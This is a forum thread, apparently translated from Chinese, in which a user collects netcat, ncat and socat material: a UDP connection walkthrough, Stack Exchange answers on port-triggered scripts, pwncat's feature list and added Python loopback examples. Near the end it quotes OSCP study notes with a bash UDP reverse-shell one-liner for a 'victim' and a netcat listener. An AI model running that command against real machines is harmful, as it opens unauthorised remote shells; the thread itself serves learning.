Wuyou Boot Forum (无忧启动论坛)

Views: 944 | Replies: 9

Learning networking topics around netcat

1#
Posted 2021-4-3 23:48:48
I've recently become interested in networking tools like netcat, ncat and socat, so this thread collects some good web pages about them. Mainly as a memo to myself.

The first one I found:

https://jameshfisher.com/2018/03/04/create-udp-connection-with-netcat/

Creating a UDP connection with netcat

The netcat command nc is most often used to create TCP connections, but nc can also create UDP connections. From my remote server, I start listening for UDP connections to UDP port 12345:

jim@remote:~$ nc -u -l 0.0.0.0 12345

I connect to this UDP server from my laptop using:

jim@local:~$ nc -u -p 54321 personal.jameshfisher.com 12345

Above, I use the -u flag to toggle UDP mode for listening and connecting, and I use the -p flag to set the source UDP port on my laptop. Before starting nc on either machine, I started tcpdump on both machines, like this:

jim@remote:~$ sudo tcpdump -n 'udp port 12345 or icmp'
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ens4, link-type EN10MB (Ethernet), capture size 262144 bytes

(You’ll see in a minute why I also included icmp in the filter.) If we were using TCP, we would have seen packets in this list as soon as we started the connection, due to the TCP “handshake” to initiate a connection. But with UDP, no packets have been exchanged yet, even though both nc processes are running.

So after starting both nc processes, do we have a “connection”? UDP is sometimes said to be “connectionless”, but I don’t quite buy this. My laptop at least is aware of a connection, and we can see the connection with lsof:

jim@local:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND     PID           USER   FD   TYPE            DEVICE SIZE/OFF NODE NAME
nc        41383            jim    3u  IPv4 0x86646b3906fdc4d      0t0  UDP 192.168.1.4:54321->35.190.176.201:12345

On the other hand, the server is not yet aware of the connection; lsof still only shows the process listening for a new connection:

jim@remote:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nc       19075  jim    3u  IPv4  80196      0t0  UDP *:12345

Next, from my laptop, I type “hi” and hit return. This sends one UDP packet containing the string "hi\n". Finally, we see a UDP packet with tcpdump:

12:49:04.462186 IP 51.6.191.203.54321 > 10.142.0.2.12345: UDP, length 3

At this point, the server is aware of the connection, and we can see it with lsof:

jim@remote:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nc       19075  jim    3u  IPv4  80196      0t0  UDP 10.142.0.2:12345->51.6.191.203:54321

So UDP does have connections, but in contrast to TCP, the UDP connection is only fully created once the first data packet is sent.

Next, I type “ack” on the server connection, and hit return. A UDP packet goes in the other direction:

13:12:57.824337 IP 35.190.176.201.12345 > 192.168.1.4.54321: UDP, length 4

Next, I kill the nc process on the server:

jim@remote:~$ nc -u -l 0.0.0.0 12345
hi
ack
^C

At this point, if this were TCP, we would expect more packets negotiating a connection shutdown. But UDP doesn't have this handshake either, so nothing is exchanged.

After killing the server process, do we have a connection? According to the server, no. But my laptop is completely unaware that the process was killed on the server, and still shows an active connection:

jim@local:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND     PID           USER   FD   TYPE            DEVICE SIZE/OFF NODE NAME
nc        41383            jim    3u  IPv4 0x86646b3906fdc4d      0t0  UDP 192.168.1.4:54321->35.190.176.201:12345

Because the nc process on the laptop still thinks there’s a connection, I can continue to send stuff with it. I type “hello..?”, and hit return. On tcpdump, I see:

13:18:27.846128 IP 192.168.1.4.54321 > 35.190.176.201.12345: UDP, length 9
13:18:27.943967 IP 35.190.176.201 > 192.168.1.4: ICMP 35.190.176.201 udp port 12345 unreachable, length 45

My laptop duly sends the UDP packet, but quickly receives a reply: “udp port 12345 unreachable”!
At this point, my laptop knows the connection is gone, and it is no longer listed:

jim@local:~$ sudo lsof -nP -i UDP | awk 'NR == 1 || /12345/'
COMMAND     PID           USER   FD   TYPE            DEVICE SIZE/OFF NODE NAME

The “udp port 12345 unreachable” information is not in a UDP packet, but an ICMP packet. This is why I included icmp in the tcpdump filter. ICMP is “Internet Control Message Protocol”, and one use is to notify remote hosts that hosts or ports are unreachable. The ICMP packet was generated by my server after it received the “hello..?” message:

13:18:27.898045 IP 51.6.191.203.54321 > 10.142.0.2.12345: UDP, length 9
13:18:27.898099 IP 10.142.0.2 > 51.6.191.203: ICMP 10.142.0.2 udp port 12345 unreachable, length 45

As with the initial connection setup, the connection teardown is delayed in UDP until a packet is received.
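The life cycle the post above traces (a "connection" visible on the laptop before any packet leaves, the server only learning of the peer on the first datagram, and the ICMP port-unreachable that finally tells the client the listener is gone) replayed on loopback. This is an added Python example, not code from the post or from netcat: it emulates what `nc -u -l` and `nc -u -p` do with plain sockets, the ports are OS-assigned rather than 12345/54321, and the ECONNREFUSED mapping of the ICMP error is Linux behaviour, so the function also accepts a plain timeout from stacks that stay silent.

```python
"""Walk through the UDP 'connection' life cycle from the post, on loopback."""
import socket
import threading


def udp_server(state, ready, closed):
    """Play `nc -u -l`: bind, wait for the first datagram, answer it, exit."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))            # like 0.0.0.0 12345, but an OS-chosen port
    state["server_port"] = srv.getsockname()[1]
    ready.set()
    # Until this returns, lsof would show only the bare listener (*:port).
    data, peer = srv.recvfrom(2048)
    state["server_saw"] = (data, peer)
    # nc's listener then connects to the first peer, which is what turns the
    # lsof entry into port->peer. connect() on UDP puts nothing on the wire.
    srv.connect(peer)
    srv.send(b"ack\n")
    srv.close()                           # no FIN/RST equivalent: the peer is not told
    closed.set()


def run_udp_session(timeout=3.0):
    """Play the laptop side and return what each step observed."""
    state, ready, closed = {}, threading.Event(), threading.Event()
    threading.Thread(target=udp_server, args=(state, ready, closed), daemon=True).start()
    ready.wait(timeout)

    cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    cli.bind(("127.0.0.1", 0))            # -p <port>: fix the source port
    cli.settimeout(timeout)
    # connect() on a datagram socket only records the peer in the kernel;
    # this is the 'connection' lsof showed on the laptop before any packet.
    cli.connect(("127.0.0.1", state["server_port"]))
    state["client_port"] = cli.getsockname()[1]

    cli.send(b"hi\n")                     # first datagram: only now does the server learn of us
    state["ack"] = cli.recv(2048)
    closed.wait(timeout)

    # Server gone, client none the wiser. The next datagram draws an ICMP
    # port-unreachable, which Linux reports on a connected UDP socket as
    # ECONNREFUSED on the following send/recv. Other stacks may stay silent,
    # so the session can also end in a plain timeout.
    try:
        cli.send(b"hello..?\n")
        cli.recv(2048)
        state["after_close"] = "data"
    except ConnectionRefusedError:
        state["after_close"] = "ECONNREFUSED"
    except socket.timeout:
        state["after_close"] = "timeout"
    finally:
        cli.close()
    return state


if __name__ == "__main__":
    for key, value in run_udp_session().items():
        print(f"{key}: {value!r}")
```

Because the client socket is connected, the kernel can match the later ICMP error to it and report it on the next call; an unconnected socket that only uses sendto() never hears about it at all, which is the usual reason a UDP client "hangs" against a dead port.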


2#
Posted 2021-4-4 01:01:35
The guy who wrote Tiny PXE Server seems to have one too, and so does some organization in Taiwan.

3#
Posted 2021-4-4 11:34:48
I can't read this English.

4#
Posted 2021-4-4 19:28:23
Can't follow it, but supporting anyway; the OP's threads are always good ones.

5#
OP | Posted 2021-4-4 20:35:55
Thanks for the replies, everyone.

@邪恶海盗:

I even found a JavaScript version of netcat:

https://github.com/roccomuso/netcat

6#
OP | Posted 2021-4-5 07:46:25
Last edited by 不点 on 2021-4-5 09:16

Today I found pwncat. I don't know what the "pw" stands for; my guess is it might mean "powerful".
My gut feeling, on first impression, is that this may be the "all-in-one" that gathers the strengths of all the other *cats:

https://pwncat.org/
https://github.com/cytopia/pwncat

Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE).

Baidu Translate renders it (in Chinese) as, roughly:

Netcat's steroids with firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port-forwarding magic - and its full script with Python (PSE).

"steroid" is 类固醇, a hormone. But "on steroids" means "pumped up on hormones, super strong".

Hahaha! So pwncat is netcat "on hormones". I wonder whether the Chinese netizens' phrase 打鸡血 ("injected with chicken blood") is a pun on 打激素 ("injected with hormones").

Looks like my guess was right: "pw" means power.

7#
OP | Posted 2021-4-5 12:13:50
Last edited by 不点 on 2021-4-5 12:17

This post is quite good:

How to set a script to execute when a port receives a message

https://unix.stackexchange.com/questions/314550/how-to-set-a-script-to-execute-when-a-port-receives-a-message

Sadly, stackoverflow and stackexchange are getting worse and worse; before they turn into complete garbage sites, copy the useful content over quickly!

I'm wondering how to get a shell script to listen in on a certain port (maybe using netcat?). Hopefully so that when a message is sent to that port, the script records the message and then runs a function.

Example:

  • Computer 1 has the script running in the background, the script opened port 1234 to incoming traffic
  • Computer 2 sends message "hello world" to port 1234 of computer 1
  • Script on Computer 1 records the message "hello world" to a variable $MESSAGE
  • Script runs function now that variable $MESSAGE has been set


How do I go about doing this?

Tags: bash shell-script networking daemon

asked 2016-10-05 18:19 by Daniel

3 Answers

Should be possible with socat.

Write such a script "getmsg.sh" to receive one message via stdin:

#!/bin/bash
read MESSAGE
echo "PID: $$"
echo "$MESSAGE"

Then run this socat command to invoke our script for each tcp connection on port 7777:

socat -u tcp-l:7777,fork system:./getmsg.sh

Send a test message from another shell:

echo "message 1" | netcat localhost 7777

edited 2016-10-05 19:40, answered 2016-10-05 18:30 by rudimeier

The UCSPI-TCP way

There are toolsets other than netcat.  Here are how to use a few of them.  They all presume the existence of a service script that runs your func, whatever that may be:

#!/bin/sh
while read -r MESSAGE
do
    echo 1>&2 "${TCPREMOTEIP}" "${TCPREMOTEPORT}" rx "${MESSAGE}"
    func
done

The TCPREMOTEIP and TCPREMOTEPORT environment variables are defined by the UCSPI-TCP protocol.
The script is spawned as an individual process per TCP connection using the various toolsets.  In what follows, the tools are shown as used within a short script.  Such a script, conventionally named run, is how one would run them under a daemontools-family service manager.  They can of course be invoked directly.

Bernstein ucspi-tcp

With Daniel J. Bernstein's ucspi-tcp, tcpserver spawns the service script:

#!/bin/sh -e
exec tcpserver -v -P -R -H -l 0 0.0.0.0 7777 ./service

There are IPv6-capable enhanced versions of Bernstein ucspi-tcp.  With Erwin Hoffman's, tcpserver attempts to handle both IPv4 and IPv6 in one (if the operating system supports this, a few do not) and spawns the service script:

#!/bin/sh -e
exec tcpserver -v -P -R -H -l 0 ::0 7777 ./service

Bercot s6-networking, s6, and execline


With Laurent Bercot's s6-networking, s6-tcpserver4 and s6-tcpserver6 handle IPv4 and IPv6 separately, and spawn the service script:

#!/command/execlineb
s6-tcpserver4 -v 0.0.0.0 7777 ./service

#!/command/execlineb
s6-tcpserver6 -v ::0 7777 ./service

One can build up more complex servers by interposing tools such as s6-tcpserver-access and s6-applyuidgid in the chain immediately before ./service.

nosh UCSPI tools


With the nosh toolset, tcp-socket-listen listens on the TCP socket, again handling IPv4 and IPv6 simultaneously if the operating system supports doing so, and chains to tcp-socket-accept which in turn spawns the service script:

#!/bin/nosh
tcp-socket-listen --combine4and6 :: 7777
tcp-socket-accept --verbose --localname 0
./service

Or one runs two separate processes, on operating systems such as OpenBSD:

#!/bin/nosh
tcp-socket-listen 0.0.0.0 7777
tcp-socket-accept --verbose --localname 0
./service

#!/bin/nosh
tcp-socket-listen :: 7777
tcp-socket-accept --verbose --localname ::
./service

One can build up more complex servers by interposing tools such as ucspi-socket-rules-check and setuidgid in the chain.

#!/bin/nosh
tcp-socket-listen --combine4and6 :: 7777
setuidgid unprivileged-user
tcp-socket-accept --verbose --localname 0
ucspi-socket-rules-check --verbose
./service

Pape ipsvd


With Gerrit Pape's ipsvd, tcpsvd spawns the service script:

#!/bin/sh -e
exec tcpsvd -v 0.0.0.0 7777 ./service

UCSPI-UDP


The common service script can handle the case where standard input is a stream socket.  But you didn't specify TCP explicitly.
Although some of the aforementioned toolkits can be used to build UDP servers in similar fashion to how one can use them to build TCP servers (cf. udp-socket-listen in nosh), it's tricky to build the actual service program with shell script, as the shell's builtins do not necessarily cope well when standard input is a datagram socket.

answered 2016-10-10 14:19 by JdeBP
   
This can also be done with udpsvd which is available on Ubuntu/ Debian (see manpage) as well as built-in to busybox.  Example:

# simple UDP "echo" on port 9998
udpsvd 0.0.0.0 9998 cat

Replace cat with your shell script to execute, stdin is the packet.

With netcat, you can run in a loop to keep listening, and pass each packet to myscript:

while true; do nc -ul 9998 | myscript.sh; done

If you wanted to pass all received packets as a stream to a single invocation of your script:

# this will keep listening instead of terminating the process:
nc -kul 9998 |myscript.sh   
answered 2018-09-21 14:43 by thom_nic
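What tcpserver, s6-tcpserver4, tcpsvd and the nosh chain have in common, shown in one place: a listener that spawns one child per TCP connection, hands the child the socket as its stdin and stdout, and exports TCPREMOTEIP/TCPREMOTEPORT as UCSPI-TCP defines them. This is an added Python example written for this thread, not code from the answers or from any of the named toolsets; the `SERVICE` shell snippet is a constructed stand-in for the answer's `./service`, the port is OS-assigned on loopback instead of 7777, and the client half plays `echo "message 1" | netcat localhost 7777`.

```python
"""UCSPI-style TCP server: one child process per connection, socket as fd 0/1,
remote address in the environment. Added example, not from the page."""
import os
import socket
import subprocess
import threading

# Constructed stand-in for the answer's ./service: one line in, one line out.
SERVICE = r'''
read -r MESSAGE || exit 0
printf 'from %s:%s rx %s\n' "$TCPREMOTEIP" "$TCPREMOTEPORT" "$MESSAGE"
'''


def ucspi_env(conn):
    """The variables UCSPI-TCP defines for the service program."""
    lip, lport = conn.getsockname()[:2]
    rip, rport = conn.getpeername()[:2]
    env = dict(os.environ)
    env.update({"PROTO": "TCP",
                "TCPLOCALIP": lip, "TCPLOCALPORT": str(lport),
                "TCPREMOTEIP": rip, "TCPREMOTEPORT": str(rport)})
    return env


def handle(conn):
    """Run the service with fd 0 and fd 1 pointing at the socket, as tcpserver does."""
    with conn:
        subprocess.run(["/bin/sh", "-c", SERVICE],
                       stdin=conn, stdout=conn, env=ucspi_env(conn))


def start_server(limit):
    """Accept `limit` connections on a loopback port, one handler thread (and
    one child process) each. Returns the chosen port."""
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(8)
    port = lsock.getsockname()[1]

    def accept_loop():
        for _ in range(limit):
            conn, _peer = lsock.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()
        lsock.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return port


def send_message(port, text):
    """Client side of `echo "message 1" | netcat localhost 7777`."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as c:
        c.sendall(text.encode() + b"\n")
        c.shutdown(socket.SHUT_WR)          # EOF for the child's `read`
        chunks = []
        while chunk := c.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks).decode()


if __name__ == "__main__":
    p = start_server(limit=2)
    print(send_message(p, "hello world"), end="")
    print(send_message(p, "second client"), end="")
```

The service script never touches the network API: it reads a line from stdin and writes to stdout, which is why the same `./service` works unchanged under every toolset in the answer. The per-connection child is also the natural place to drop privileges (setuidgid / s6-applyuidgid in the answer) before the untrusted bytes are parsed.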

8#
OP | Posted 2021-4-5 13:01:26
https://unix.stackexchange.com/questions/86517/command-line-streaming-string-manipulation-from-netcat

Command line streaming string manipulation from netcat

I have a netcat udp connection listening with nc -l -u .... I've been trying to do a per packet manipulation of the incoming data with just command line, but it doesn't look like there is a flag in netcat to indicate a new packet.

First, is it possible to just apply a new line to the end of each packet coming in from netcat?

If not, is there a way instead to match a string and output a new line while netcat is streaming in data?

Tags: udp netcat

edited 2013-08-13 22:39 by Gilles 'SO- stop being evil', asked 2013-08-13 03:35 by Ratzes

1 Answer
Server side:

# nc -l -u -p 666 > /tmp/666.txt

Other server side's shell:

# tail -F /tmp/666.txt | while IFS= read -r line; do
    echo "$line";
    # do what you want.
  done;

Client side:

# nc -uv 127.0.0.1 666
#### Print your commands.   

edited 2013-08-13 22:40 by Gilles 'SO- stop being evil', answered 2013-08-13 07:33 by woodstack
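The accepted answer pipes nc's output through a file, but that stream has already lost the packet boundaries the question wants: `nc -l -u` writes each datagram's bytes straight to stdout with nothing in between. The boundary does exist one layer down, because a datagram socket hands back exactly one packet per recvfrom(). Here is an added Python example (not code from the question or the answer) that receives on a loopback UDP socket and emits one line per datagram, escaping any newline inside a packet so a downstream `while IFS= read -r line` loop still sees one line per packet; the port is OS-assigned instead of 666 and the payloads are constructed.

```python
"""Per-datagram framing for UDP receivers. Added example, not from the page."""
import socket


def frame_datagrams(datagrams):
    """One text line per datagram. Newlines and backslashes inside a packet are
    escaped so a `while read -r line` consumer still sees one line per packet."""
    lines = []
    for d in datagrams:
        text = d.decode("utf-8", errors="replace")
        lines.append(text.replace("\\", "\\\\").replace("\n", "\\n") + "\n")
    return "".join(lines)


def send_and_collect(payloads, timeout=2.0):
    """Send each payload as its own UDP datagram to a loopback listener and
    return the datagrams exactly as the listener's recvfrom() delivered them."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))               # the `nc -l -u` side, OS-chosen port
    srv.settimeout(timeout)
    port = srv.getsockname()[1]
    cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        for p in payloads:
            cli.sendto(p, ("127.0.0.1", port))   # one sendto() == one packet
        got = []
        for _ in payloads:
            data, _peer = srv.recvfrom(65535)    # one recvfrom() == one packet
            got.append(data)
    finally:
        cli.close()
        srv.close()
    return got


if __name__ == "__main__":
    received = send_and_collect([b"first packet", b"two\nlines", b"third"])
    # What `nc -l -u > /tmp/666.txt` leaves behind: boundaries gone.
    print(repr(b"".join(received)))
    # What the receiver can emit instead: one line per packet.
    print(frame_datagrams(received), end="")
```

If the receiver has to stay nc, the same effect needs a delimiter the sender agrees to put at the end of every packet; there is no flag in nc that can recover boundaries from its own stdout after the fact.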

9#
OP | Posted 2021-4-5 13:08:03

https://fareedfauzi.gitbook.io/oscp-notes/reverse-shell/linux-reverse-shell

Bash UDP

Victim:

sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:

nc -u -lvp 4242


10#
Posted 2021-4-13 18:14:22
Please keep going, OP; I'm here to learn, and I support you.

GMT+8, 2021-4-23 09:12